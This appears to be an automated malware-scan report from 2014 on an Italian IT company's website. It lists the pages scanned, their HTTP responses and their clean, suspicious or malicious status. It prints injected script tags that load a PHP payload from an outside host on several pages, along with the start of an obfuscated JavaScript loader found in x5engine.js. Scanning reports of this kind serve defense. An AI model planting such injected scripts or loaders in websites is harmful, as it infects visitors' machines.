Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=afinformatica.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://afinformatica.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:25 GMT Location: http://www.afinformatica.it/ Server: Apache Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/ | HTTP/1.1 200 OK Date: Wed, 08 Oct 2014 10:10:25 GMT Accept-Ranges: bytes ETag: "bd9d1fa37e26cf1:43dc6f" Server: Microsoft-IIS/6.0 Content-Length: 6126 Content-Location: http://www.afinformatica.it/index.html Content-Type: text/html Last-Modified: Mon, 10 Feb 2014 16:39:16 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.afinformatica.it/index.html | 200 OK Content-Length: 6126 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.laflordelpirineu.com/KZQmpxW6.php?id=19130397" type="text/javascript"></script> | ||
http://www.afinformatica.it/res/swfobject.js | 200 OK Content-Length: 32688 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 
var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", ON_READY_STATE_CHANGE = "onreadystatechange", win = window, doc = document, nav = navigator, plugin = false, domLoadFnArr = [ma Antivirus reports:
| ||
http://afinformatica.it/res/jquery.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:27 GMT Location: http://www.afinformatica.it/res/jquery.js Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/res/jquery.js | 200 OK Content-Length: 98094 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),ci.close Antivirus reports:
| ||
http://afinformatica.it/res/x5engine.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:28 GMT Location: http://www.afinformatica.it/res/x5engine.js Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/res/x5engine.js | 200 OK Content-Length: 6426 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) busleo=String;daidp="spl" "i" "t";fglrde=window;rzjdx=(1)?"0x":"123";znfu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(sffrkb){uprllu=false;try{}catch(unalru){uprllu=21;}if(1){vnsklt="17Zq5dZq6cZq65Zq5aZq6bZq60Z Antivirus reports:
| ||
http://afinformatica.it/res/x5cartengine.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:29 GMT Location: http://www.afinformatica.it/res/x5cartengine.js Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/res/x5cartengine.js | 200 OK Content-Length: 56554 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) _jq.extend(x5engine.imCart, {
_restoreSpecialChars: function (str) { return str.replace(/\{1\}/g, "'").replace(/\{2\}/g, "\"").replace(/\{3\}/g, "\\").replace(/\{4\}/g, "<").replace(/\{5\}/g, ">") }, // Test if cookies are working in the current browser _testCookie: function () { _jq.imCookie("imCookieTest", "test_content"); if (_jq.imCookie("imCookieTest") == "test_content") return true; return false; }, // /*/a9a007*/ Antivirus reports:
| ||
http://afinformatica.it/res/l10n.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:30 GMT Location: http://www.afinformatica.it/res/l10n.js Server: Apache Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/res/l10n.js | 200 OK Content-Length: 22332 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) x5engine.l10n.addLocalization('admin_comment_abuse', 'Questo messaggio è stato segnalato come abuso!');
x5engine.l10n.addLocalization('admin_seo_auth', 'Inserisci i tuoi dati di accesso a Google Webmaster Tools'); x5engine.l10n.addLocalization('admin_seo_crawl_mex', 'Messaggi da Google Bot'); x5engine.l10n.addLocalization('admin_seo_home', 'Risultati di indicizzazione'); x5engine.l10n.addLocalization('admin_seo_keys', 'Chiavi di ricerca indicizzate'); x5engine.l10n.addL Antivirus reports:
| ||
http://afinformatica.it/res/x5settings.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:31 GMT Location: http://www.afinformatica.it/res/x5settings.js Server: Apache Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/res/x5settings.js | 200 OK Content-Length: 8127 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) x5engine.imQueue.push_init("x5engine.imDate('.imDate')");
x5engine.imQueue.push_init("x5engine.imHour('.imHour')"); x5engine.imQueue.push_init("x5engine.imAccess.showLogout()"); x5engine.imQueue.push_init("x5engine.utils.autoHeight()"); x5engine.imQueue.push_init("x5engine.imCart.updateWidget()"); x5engine.imQueue.push_init("x5engine.imCart.setupProductList()"); x5engine.imQueue.push_init("x5engine.imGrid.init()"); x5engine.imQueue.push_init("x5engine.imMenu.se Antivirus reports:
| ||
http://afinformatica.it/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:32 GMT Location: http://www.afinformatica.it/index.html Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://afinformatica.it/presentazione-.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 08 Oct 2014 10:10:32 GMT Location: http://www.afinformatica.it/presentazione-.html Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.afinformatica.it/presentazione-.html | 200 OK Content-Length: 8552 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.laflordelpirineu.com/KZQmpxW6.php?id=19130398" type="text/javascript"></script> | ||
http://www.afinformatica.it/servizi.html | 200 OK Content-Length: 8504 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.laflordelpirineu.com/KZQmpxW6.php?id=19130399" type="text/javascript"></script> | ||
http://www.afinformatica.it/dove-siamo.html | 200 OK Content-Length: 6077 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.laflordelpirineu.com/KZQmpxW6.php?id=19130395" type="text/javascript"></script> | ||
http://www.afinformatica.it/contatti.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.afinformatica.it/documentazione.html | 200 OK Content-Length: 5608 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.laflordelpirineu.com/KZQmpxW6.php?id=19130394" type="text/javascript"></script> | ||
http://www.afinformatica.it/files/Comparativa_funzioni.pdf | 200 OK Content-Length: 86812 Content-Type: application/pdf | clean |
http://www.afinformatica.it/imsitemap.html | 200 OK Content-Length: 5245 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.laflordelpirineu.com/KZQmpxW6.php?id=19130396" type="text/javascript"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: afinformatica.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 08 Oct 2014 10:10:25 GMT
Location: http://www.afinformatica.it/
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
GET / HTTP/1.1
Host: afinformatica.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 08 Oct 2014 10:10:25 GMT
Location: http://www.afinformatica.it/
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: afinformatica.it
Referer: http://www.google.com/search?q=afinformatica.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: afinformatica.it
Referer: http://www.google.com/search?q=afinformatica.it
Result:
The result is similar to the first query. There are no suspicious redirects found.